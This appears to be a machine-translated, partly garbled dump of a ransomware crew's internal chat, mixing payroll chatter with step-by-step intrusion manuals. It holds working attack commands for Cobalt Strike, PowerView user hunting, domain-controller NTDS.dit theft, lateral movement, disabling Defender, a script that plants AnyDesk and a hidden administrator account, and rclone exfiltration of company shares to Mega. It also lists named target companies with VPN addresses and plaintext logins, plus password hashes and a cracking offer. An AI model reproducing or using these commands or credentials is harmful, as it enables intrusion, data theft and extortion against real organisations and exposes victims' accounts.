What kind of mailing? Is there a mailing list or something?I had a problem with the car, I had trouble restoring it, I had to go back to the car, but I had to go back to the car. I had a problem with the car, all restored. At work, I get into, twin not too lazy, detailed manuals pouredvnikayut work ?Hi there mango lost you @all Hello! Who did not get wages - send in a personal account wallets, the evening will be all! vampiret scripts and description for cobalt, but do not need to yuse them on the cob, the session goes to the slip for 300 sec@jumbo download ``https://www.sendspace.com/file/qwjl9c
Archive password: popo99
here's cobalt 4.3
This is how we ping hosts. Create on your desktop TXT FILE named domains.txt
2. YOU HAVE SORTED OR JUST LOCAL COMPUTER NAMES PUT THEM IN THIS FILE
3. FILL YOUR MACHINE (C:ProgramData) WHICH WILL PING FILE domains.txt and p.bat
4. ENTER p.bat by using shell command
5. After pinging download res.txt file.
The scripts above are for cobalt, please don't use them when on a shared cob. + I will tell you another point about ad_users, there is a lot of information about employees, there you can find technicians, engineers, etc. We usually need ad_users when we want to find admin's car, because on admin's cars we can find passwords from antivirus console, from cloud backups and so on. Now I will send you the USERCHANTER manual, with it we find these cars. Just ad_users, we need to get there SID, for golden ticket, but about this later
1. Make a list of tags
1.1 Open admin_users , find out who we are potentially interested in: admin / engineer / IT
Get the account logins from sAMAccountName
1.2 Get the list of domains admins
1.3 put the first and the second in the file list.txt
2. aploat the powerview.
2.1 powershell-import _/home/user/soft/powerview/view.ps1_
2.1 -comment: import powerview from /home/user/soft/powerview/view.ps1
2.3 Hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt
instead of 1884 - the PID of the process where we have enough rights to inject.
x64 - or x86 bitrate of the process. see in the tasklist
In cprogramdata\list.txt should lie the list that we did in point 1.
In 5-10-20 minutes you should see the result in out.txt. If the file is 0 bytes then either AB has hit it (if AB has hit it, you will see it in the cob)
See who is working with the database (hosts and users from where you connected to it)
shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"
1. Display all databases on the server in kmd
shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
with size in megabytes
shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"
2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRCHOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"
2.1.
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"
3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;"
4. Unload the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;"
sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W
5. Search by column names in a specific database using %pass% as an example
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"
6. Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates
sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt"
FULL >
sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt"
7. Output all tables of a particular database
shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
for remote/other local server change localhost to ip,port
alternatively localhost,%port% (watch netstat)
If a table or database is named with 2-3-4 words - then it is escaped like this [%databasename/tablename%]
sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK='d:\adw.bak'"
``Good stuff, I recommend it,`` AnyDesk - read all about it.
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
AnyDesk
Running the code in Powershell ISE Run As Admin
Get ID
We save it to ourselves
We download Anydesk on a separate virtual desktop and give it an ID.
Press Console Account
Enter password
Quote
J9kzQ2Y0qO
And then log in with a local administrator or domain account and take advantage of Anydesk
You can also download/download it to the victim's machine, which can be useful for examining and searching documentation point by point.
``````Get access to the server with Shadow Protect SPX (StorageCraft) backups
==
1. RDP access to one of the servers, in my case it is a SQL server.
2. On the desktop, we see the ShadowProtect SPX icon
-> click on it.
3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software)
4. On the left side in the "Job Summary" block you will see the detailed description of backup scheme
In the "Name" field - backup name of our server
in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE)
From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself.
5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied".
6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges
7. Let's assume that if it is a dedicated user, he has a similar name to the software/function:
we go through the logins with substrings (here we need to get fancy):
Storage
Shadow
Protect
Craft
SP
SPX
Backup
BUUser
ETC.
then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.)
8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server.
Try to dump hashes
Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar)
In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos:
* Username : SPAdmin
* Domain : COHBackup
* Password : Backup!User
(in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value))
9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access
10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup
===
`````` add firewall rules
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
# add to registry new port
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350
# powershell
Restart-Service termservice -force
Changing RDP port
``````Installing a metasplot on the VPS
1 apt-get update
apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
apt-get install nano
apt-get install gpg
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
2
then open
nano /opt/metasploit-framework/bin/msfdb
find and comment on these lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database
save CTRL+O
msfdb init
``LittleBig1) Script for collecting balls
2) Script for gathering kerberos
3) Script for hunching admins above adfinder, for collecting ADscript for sorting ADallias for metasploit above ``https://t.me/peass
https://t.me/antichat
https://t.me/thebugbountyhunter
https://t.me/club1337
https://t.me/infosec1
https://t.me/RalfHackerChannel
https://t.me/in51d3
https://t.me/exploithacker
https://t.me/Premium_Hacking
https://t.me/DownloadCourse14
https://t.me/ViperZCrew
https://t.me/techpwnews
https://t.me/cyb3rhunt3r
https://t.me/cveNotify
https://t.me/MalwareResearch
https://t.me/BugCrowd
https://t.me/itsecalert
TG forum list, lots of interesting stuff
``````Some way to Dump NTDS without getting dirty
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
query the shaddy listings, there is a date, check if it is a recent date.
They're almost certainly already there, if not, we'll do it ourselves.
net start Volume Shadow Copy
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
then in the Shadow Copy listing find the most recent one
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55
respectively we need the copy number for the following command
shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\?
ntds.dit / security / system files should fall into c:\temp\log\
take the portable console 7z and pack it in the archive with password
Code: [Highlight]
7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
download the password-protected archive to yourself, if you get an error (the file is corrupted) when decrypting the ntds file, then do the following
Esentutl /p C:\log\ntds.dit
the trick of this method is that we do not actually dump anything, we just take and download the ntds
so we don't get caught pulling out the ntds we pack it in a password protected archive
If you have a problem with being burnt and kicked off the network after a ntds dump, try this method
it is possible to burn only by the fact of some leaked date from cd, and it is impossible to analyze what exactly you take without knowing the password from the archive
`````` a stack of manuals on raising rights, for those who don't know English translate here deepl.com
github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet
``````1. YOU HAVE FACE res.txt, OPEN IT IN NOTEPAD++
2.PRESS CTRL+F IN THE SEARCH BOX AND TYPE TTL
3.HIT FIND ALL IN CURRENT DOCUMENT YOU WILL SEE A WINDOW WITH IP AT THE BOTTOM
4. go to en.toolpage.org/tool/ipv4-extractor THEN paste everything you get and get a clean ip
``````How to sort collected AD from the net
1) Download FileZilla
2) Download Putty, put Putty through the torus
Go here torproject.org/download/tor/
Download the WARNING Expert Bundle
Unzip it, go to the Tor directory and run tor.exe
In a few seconds it will reach the message 100% Done
In Putty settings, go to proxy, set sox5, IP 127.0.0.1 port 9050
3) Go to the server via filesilla > go to the directory "Script" - put next to the script AD files
4) Switch to Putty, go to the server, go to the directory where the script is, give the command
./script.sh
5) Finished, go back into FilleZilla and take our sorterd out. Be sure to remove the AD files and the sortertad folder after yourself, if the sortertad folder is not removed, just change it to whatever name you want
`````` HOW TO JUMP THROUGH SESSIONS WITH PAYLOAD
Commands to run peloid, to pull up the session in cobalt
1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
2) shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15"
3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F
instead of
MS040926754153
put in
ipac
run through the commands one at a time
1) creating a ride with paiload
2) turn on
3) deleting
Running VMICOM we use it more often
1)If it is a dll, then
shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW"
Accordingly, where ipi, insert the ipi of the machine on which we have access, then comes the path and the name of our dll, I think the syntax is clear
If you are on RDP > open CMD as administrator and rundll32.exe C:\ProgramData\x64.dll,StartW you can specify any path according to where your dll is
For EXE format or .bat format, running VMICOM is like this
shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"
I'll fill it in later. I'll list everything at once ``How to download and what info
1) After we raised the rights, found the Admin Domain, we pull the sesi into the cobalt
2)We put the YES token on and Remove the balls this way :
*powershell-import - we upload ShareFinder there as usual and give the room the following -
psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
Next, we study the balls that were taken, and we're interested in
*Financial documents
* Accounting
*Ity
*Customers
*Projects
And so on, it all depends on what our targeting is doing.
Next we do the following > here is the Diablo Manual, everything is easy to understand and understand
Rclone
to start downloading through rclone you need to create a config
to create a config open cmd go to the directory where rclone.exe is
Run rclone.exe with the command: rclone config
choose from the menu new remote
call it mega and enter mega once more
after that we typed the mega mail address after it will ask for a password to enter or generate we will choose yours with the letter 'Y'
the password won't show up on insertion but it's still there
after creating the config you get thrown back to the main menu and you get out of the rclone.
then enter the command rclone.exe config show it will show the config
copy it and create file rclone.conf where we put this information.
when we found the balloons we download the exe and the config to the target machine with the rights to hide the config and the exe so they will not be found
go to the exe directory and give the following command: shell rclone.exe copy "\\envisionpharma.com\IT\\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
where: \envisionpharma.com\IT\KLSHARE are balls
Mega:Finanse is the location of the files in the mega (can create a folder in the mega on its own)
streams 12 --transfers 12 is the number of streams that pump to the maximum (12) is not recommended because you can easily get caught
shell rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - here is an example in this case on FTP
!!!RKLON ITSELF WEIGHS ABOUT 50MB, THE LINK TO IT WILL BE BELOW THE POST!!!
`````` GO TO AGENT:
RIGHT-CLICK ON AGENT AND PRESS INTERACT
1) see the list of shell net group "domain admins" /domain
2) domain name shell net view /all /domain
3) LIST the DC shell nltest /dclist: "NameDomain"
4) CHECK THE LIST OF SERVERS
INSTALL THE PowerView MODULE
RIGHT-CLICK on the Get Info > Get Servers Agent
GET LIST OF SERVERS
5) SEE THE LIST OF COMPUTERS
AS THE PowerView MODULE IS ALREADY ENABLED
RIGHT-CLICK on the Get Info > Get All Computers Agent
GET LIST OF COMPUTERS
6) YOU NEED TO FIND OUT PASSWORDS OF ALL DOMAIN ADMINS
RIGHT CLICK ON AN AGENT
CLICK ACCESS > DUMP HASHES
GO TO VIEW > CREDENTIALS
GET ALL HASHES AND LOOK FOR DOMAIN ADMINS
7)WE NEED TO FIND NAS , BACKUP
THIS IS THE COMMAND WE KNOW ALL SUBNETS OF THIS DOMAIN
THIS COMMAND FIND OUT AT WHAT IP ADDRESS IS NAS , BACKUP
portscan 107.191.177.1-107.191.177.255 5000 icmp 1024
A LIST OF USEFUL COMMANDS THAT MAY COME IN HANDY:
Remove AGENT RIGHTS BEFORE DEFOLST rev2self.
turn on the user via the CMD shell net user careadmin /active:yes
USER INFORMATION shell net user careadmin /domain
Turn ON RDP CONNECTION shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control_Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DISCONNECTING DEFENDER powershell Set-MpPreference -DisableRealtimeMonitoring $true
POLICY REVIEW shell repadmin /syncall /AdeP
SHOW HOME TRUSTS shell nltest /domain_trusts /all_trusts
shell wmic /node: "PC NAME" process call create "COMMAND TO DO"
`````` INITIAL ACTION
1) Unchecking AD - allows us to see how many servers and workstations are on the network, as well as information about users and their positions, and after unchecking AD we sorted it in order to sort out only what we need - we will show it to you later
2) The sharfinder is a way to determine where we have access to this user (to other computers).
3) Kerberos attack - pulls hashes from memory, if successfully removed and successfully decrypted - we are guaranteed domainAdmin
4) If we have system rights, with the command "hashdump" and "logonpasswords" we can pull hashes and mimics and we will have the password of a domain user, and sometimes even the domain admin
5) If we have found a login and hash of the admin domain and we have not been able to hash, we do the following command pth Domain\Admin pass (as hash), using the command shell dir \ip or hostname\c$ we check access to the server or workstations
6) If we find the login\pass domain of the administrator or user, we can put his token, the command looks like make_token Domain\Admin Pass , if you want to remove the token, the command rev2self
7) If the session has a process system , with the getsystem command you can raise the system rights in the session, point (4)
8) Do not forget to watch the processes with the command ps, there you can find the user, migrate to his process > Explore > Process list > then select the user process (the user must be different, not the one in the session) and press inject, select the SSL listener
9) After migrating to the new user you also need to remove balls to see where you can break through with it.
10) When you remove the balloons, at the end of the removal of the directory C:\ProgramData and there is sh.txt or shares.txt, download it and see how many "remote admin" in the textbook, if there is more than one, it means that you have access to another computer
11) Click on session > File Browser > write path\ypie or hostname of the computer you have access to\c$ , put there peloid, I will give it to you later
12) Launch the package depends on its format eh or dll, I will explain later personally
13) To ping the server and workstation, we need p.bat, I will throw it in the group. Create a txt file, call it domains.txt, put there hostnames servers or minutes. Hostnames are taken from the withdrawn AD, with the script, they will show how to use
14) If you found a password, you can also run it through smb_login - an instrument in metasploit, I will give a metasploit and tell you how to use it. smb_login will show which servers or woks, have access to these scripts
``Manuals_team_Boyfriends who did not get the weekend zp write to pmbudet*she all budtrebyatki who I get zp send walletsPrietPrivet viemprivetperevet🖐privetprivetnetmanPrietPrivetprivetvsvsvetgorec_SupportgorecHi all! Guys who are newly connected to the chat - send in pm their backup jabbers in case the rocket gets tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Armitage Teamserver Setup by Graf
1. Install the metasplot
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
; ./msfconsole run the metasplot
2. Install Postgresql
apt-get -y install postgresql
3. Installing and unpacking Armitage
wget http://fastandeasyhacking.com/download/armitage150813.tgz
tar zxvf armitage150813.tgz
4. Create a user and give him sudo rights
adduser %username%
usermod -aG sudo %username%
5. Initialize the metasplot database from the newly created user and export MSF_DATABASE_CONFIG with the .yml address obtained during initialization
msfdb init
; msfdb reinit - Deletes and reinitializes the database.
; msfdb delete - Deletes the database.
; msfdb start - Starts the database.
; msfdb stop - Stops the database.
; msfdb status - Shows the database status.
export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml
6. Launch Armitage Teamserver
cd /path/to/armitage
./teamserver [external IP address] [password]
Useful Links
Installing the Metasploit Framework -
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
Armitage installation -
http://www.fastandeasyhacking.com/manual
* This guide assumes that you already have experience working with *unix systems and you will be able to deal with difficulties arising in the process.
Write to pm for life, @all guys, is there anyone sitting on a fresh cob? Go to me for nets. If you have a clean cobaltjohnnuggetsribe donald, opishee pm how will youribe donald, opishee pm how will youdonaldWell, you can send in pm purse and the amount in bets to pay:) and your duties (coder, admins what project, etc in short) All Hello! Guys, today / tomorrow payroll, so who recently started - send in a personal note the date from which you work, external backup gibber and who is your team lead. Who is not in the list - wages will not get:) Happy Monday to everyone :) otherwise there will be confusion.
Guys, under team leader, put me
Hello Something new, if we have our internal toad - it too so please all these citizens to send me in the PM your nickname, external jobber (any public will do, as a backup means of communication, in case the rocket breaks), who's your team lead and from what date work I will give salary to those of you who wage all local@all guys who have not received zap yet write in the personal message please super!)@all Hello All, send wallets in a personal message for wages. Those who receive wages from me :) @all Hello, everyone who zp I get - write in the personal kosh@twin bros are you going to work? I have a lot of things to tell you about my work, but I have to tell you in person.
vnjSxzeBkX8N4kJ2y2VgNoLhwx1u8q34G8Ibnh27E2h0leAvJzPlCuOxENCbVw50
``Nation, need new servers koba and not only, the old cuts the traffic. Who to order from? Hey bro, on the zp have any info? @all Hi all! who gets zp from me - write in person kosh+senku bro, study@all gang, study conf conf conf manualsvampirLittleBigjumbotwinall Hi! Sorry for the delay, who online - write in person on the zp
"it's all coming up" (s)+forum wars
cheating
and everything about the pub - we all do not care, friends, watch yourself, the train can come for anyone who does not think with his head, remember how you read other people's mail - they can read, and you're sorry for the "orderly tone"
but this isn't a telegram channel for little hackers
I hope everyone understands. It's not our topic. We've forgotten.
"Chocolate is not to blame "period.I STRONGLY recommend that I write to pm if there are people here who were the adverts of the software, stop right here and now the discussion of this event + Yes, the news is one thing, and what is there in practice is not clear yet yoyu interview with them where they said that I have access to nuclear missiles. Well a lot of red lines were crossedRevil is partner software, where a lot of people localize what comes into your headDon't worry, everything is fine. All the best to you and your loved ones and most importantly health and happiness, and we'll steal more money. If anyone wants to work on the yng, i'm here for the holidays, there are cases) after the holidays will be a global updatd here all of us and more will guys who have cobalt crypto at hand? pick up the targetet it only for our so understoodmrFlintstoneeldoradografalexspoonsonarstakantwinpiperryfuryAir guys do we have a rocket that starts with https://6yp ? In torey who has armitage ? share the plies and then their off site is lyingDi11erHi all guys who have recently joined the chat - send in pm their backup jabber in case the rocket will get tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Hi, I could not get into this chat, reverse helped, now all is wellHow are you doing? Hi@all now this one is pulling
https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918
Revenue: 2kkk
98.174.166.162:10443
MelissaDunkle : Rose2016
DougClagg : Kaelynlyn1
If you can't tomorrow afternoon, let's see what you're doing wrong, try it again.
you have a virtual computer on the deck, just do not knock, no error and on it raise the VPN and the virtual computer with the bridge Deploy the virtual computer as it should on the virtual computer and what she writes it does not come?we can't get it from there and we can't send it to the coba so raise the VPN on the virtual desktop and raise the VPN on your virtual desktop, everything is ok, even on http does not let on the web i will think of something either today or tomorrowWhy, i'm busy now i'll send you the heloide here Let me do it from mineTried to create a virtual machine on the rods, the same situationvpn up, the rods are not pulling The rods are not pulling to the kobaNo jumped?and how's it going? @twin where's the channel?
3. https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918
Revenue: 2kkk
98.174.166.162:10443
MelissaDunkle : Rose2016
DougClagg : Kaelynlyn1
4. https://www.dnb.com/business-directory/company-profiles.autopistas_del_sol_sa.92b12328da08fa19d4c395e60f909f75.html
200.105.84.66:10443
avillaverde : ViniciuS2020$
avillaverde : ViniciuS09$
``Friends, who has a Windows 7 image? Hi guys, who recently started - send a date in the personal list, with which you work, external backup jabber and who is your team lead,
And your duties (coder, admin what project, etc. in brief)Ііq51B↩vidtautorvalte guys share juxtaposition in pm pliz)brusshelsheskurrivet:metal:we are a legion)and we are more and more, I ooooochee like it:zany_face:Hi)¼argauWell, hello! Send a purse and the amount of btz to zp in pm! dark@all brothers for technical reasons zp postponed to the IPA. Please do not worry, the IPA will be all ironclad, hang BTC, and since the weekend ahead - most likely to postpone the IPA. If anything comes before then I'll let you know right away. If it comes tomorrow - I'll be in touch all weekend! I have not heard anything for a long time, ask mangostevenWho's your team leader?
maybe know what the lull? click@alter @steven @Air oursaga )LittleBigstickjumbo Happy New Year, colleagues! Vas toze vsech s nastupaeshim !!))`)
HAPPY NEW YEAR !!! I WISH YOU HEALTH, EVERYTHING ELSE WILL BUY !
Happy New Year to everybody! I want to wish everybody the best, and most importantly health to you and your loved ones. And that everything goes up - from rights to you know what)))) Happy New Year to all. And by the way - there are cases) go to the coba who would be bored) With a Happy New Year!!! All the best in the new year!! With a Happy New Year everyone! Good luck to all.klaxonprizrakaga )+respect cryptorukpt good everything flies without a problem then there will be confusion ``.
Guys, in the teamlead box, put me
If there is our internal toad - its too,ask all such citizens to send me in PM your nickname, external toad (any public will do, as a backup means of communication, in case the rocket breaks), who's your Team Lead and from what date work I will issue wages to those of you who are on salary to all local guys who are in touch send wallets in privatedobavim@Air @steven do not forget to throw in the confab, again I see that the confab is, but I'm not in it) completeportables.com ? I don't see a case like that@all
```
ZI3Qfg81dEJOrKaNwID6EKW799vXK105jxI2jZIKpitmcf7f6hbqEkxtKqZhudV
```
Who is it? Peace to all local:nerd:All new joiners need to unsubscribe me in person so I put you on the balancevshe Hi! Bros plan to pay either tonight or tomorrow, as will be the news I myself otpisuyut all) and your duties (coder, admin what project, etc in short) All Hey! Guys, today / tomorrow pay, so, who recently started - send a date in a personal letter, which work, the external backup gibber and who is your team lead. Who is not in the list - wages will not get:) All have a Monday :) klahonvirtulku pickupparni how to remove the hell if the av just immediately rubs files in progodate. av - santinel. targeting at 8kkk) is there anyone to help?) ok all found all spsdlya stop what services need batinok? @all give batik to stop services plyz!!mangomne need to go away for 1-2 hours and will be until morningfiksanem otpisuyu so far fixingparni files through sendspacevampirLittleBigstickjumbo after the holidays will be a global updatd here all of us and still willparni who has a cobalt crypto at hand? pick up should targetetetetet only for ours I understandmrFlintstoneeldoradografalexspoonsonarstakantwinpiperperryfuryAiralterstevenadmin_IRYmQv2EnHjaxtesttesttest_uplodarbakadonaldAll hello! I can send in pm purse and the amount in bets to pay :) Hi, who gets my zp write in personaliiloparni who have not received in the weekend zp write in pmpantsantra, if you need decrypts hashes hiding passes and you need ClearText you can apply ... I own a modest farm for Hashcat on 2xRTX2080Super. I will be glad to help you.
(
Hash - NTLM/SHA1/MD5/NTLMv2/DCC2/...
example result
YourHash:Password
0edca1229618638065b944e8b8fc6b7e:dadandmum18
a0d31f5b27ec38230c4d4810b7a62684:Astrology1@
a50e613d30c6f5b3b7d923349328fc3b:akusayang08
)
RanXerox,
Send me a Fax, use RanXerox! HiHELLOU to all of you!!! martinloveok in an hour we will come to look at the load there is installed there fortyclientaga okSOVA://209.222.101.242:64132
P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm139 298 679|qp48ihqq - ıtvıverlıtem cobu access and tym on ddik putin 7 or 10cu on ddik virtualku liftDo, we can not pull up to cobu jump?let's try what ?www.wyndhamhotels.com_TEAM_СС new 2022 !!!
🥳:grin:[ ](https://xerela.com/channel/general?msg=k6wP9ptCx53so36GG) :v: :grin:Happy New Year, survivors))))) also on the car is logmeaga and as the weather closes the client and go to@eldorado you have another write back I write you in the torus no luck? search for the key name of the user and you? Brother, what is it with you and have a script in the cob that would pull it off?the registry I understand, but where on the machine is the file where it is stored and steven, I need you on another topic )))) it stores if there is a tick to remember on the connection does anyone know if WIN7 stores passwords somewhere from the connection? yes those lumineers lard? domain is there) yes it would be logical so where to get the username and passwords so they domain probably asks the creeds) 0_0create) VPN connection creates?let me see the config in the windup directly into the connection where to import? there is no client it importsnu let me see the config let me see there is a key, no crid) o_o I still spied it az com)? i missed something so what kind of VPNN wrote tebeklient no, there is a script + batnickam just a VPN imported into the connectiona very large conkrito write to the toad@eldorado what kind of VPN client?there are a number of questions, how to enable keylogger. where in win 7 are stored passwords from VPN connection. serts stolen, need to get passwords and is it possible? preferably immediately the amount and kosh :) hi All! Who gets my salary - write in person :) _Patsantre_ , well, what's the zoo?
Who taught you how to read?
I'm a kind, good guy who allows you to use cheats, i.e., to chase your
Hash on my GPUs and dictionaries, which don't take five minutes to compile...
Just one thing, please don't complicate my work.... If NTLM, NTLM and Md5/sha1/\'some us\'...
`FORMAT user hash
```
MD5 aperia 4c1874760fb49ebdabadd6cc4232ed7b1
NTLM miriam 669bfafdb4990fe1c953f8ac5a15586d
SHA1 luke 8a233d0252d2c659b3a26cf4cf25d59d409615ab
```
And here's the kicker - it's DCC2 (I fucked them!)
`$DCC2$10240#techpilonm#a056cd163d1edf16d4827d2b0dd5945a:%TGB4rfv`
Here are the speed stats:
```
MD5 80696.7 MH/s [ 84616622899 tries/sec ]
Sha1 26210.2 MH/s
NTLM 134.0 GH/s
DCC2 1044.4 kH/s
BitcoinWallet 17111 H/s [ 17111 attempts/sec ]
```
If I still have to chase that config does not brute force something because again MD5, I think it's a shame.
***
[serviceman's voice](https://hashes.com/en/tools/hash_identifier)
Go in, check it out, throw.... Ah site is also provided with their database piercing service...
([Decrypt](https://hashes.com/en/decrypt/hash) like to call it)
_here's more
`https://crackstation.net/`
`https://md5decrypt.net/en/Ntlm/`
`https://md5decrypt.net/en/`
`https://md5hashing.net/hash`
`https://www.cmd5.org/`
[Cloudtopolis - if you want to fuck with me](https://github.com/JoelGMSec/Cloudtopolis)
So # ATTENTION !!!
FORMAT user hash
sps@twin how's it going ? Hey everyone, the plan is to ST tonight / tomorrow morning, as soon as - I will immediately write to all. Please have a little patienceinvictussmokeNeed a clean coba - targetets 1kk and250k now online_Patsantre_ , well, what's the zoo?
Who taught you how to read?
I'm a kind, good guy who allows you to use cheats, i.e., to chase your
Hash on my GPUs and dictionaries, which don't take five minutes to compile...
Just one thing, please don't complicate my work.... If NTLM, NTLM and Md5/sha1/\'some us\'...
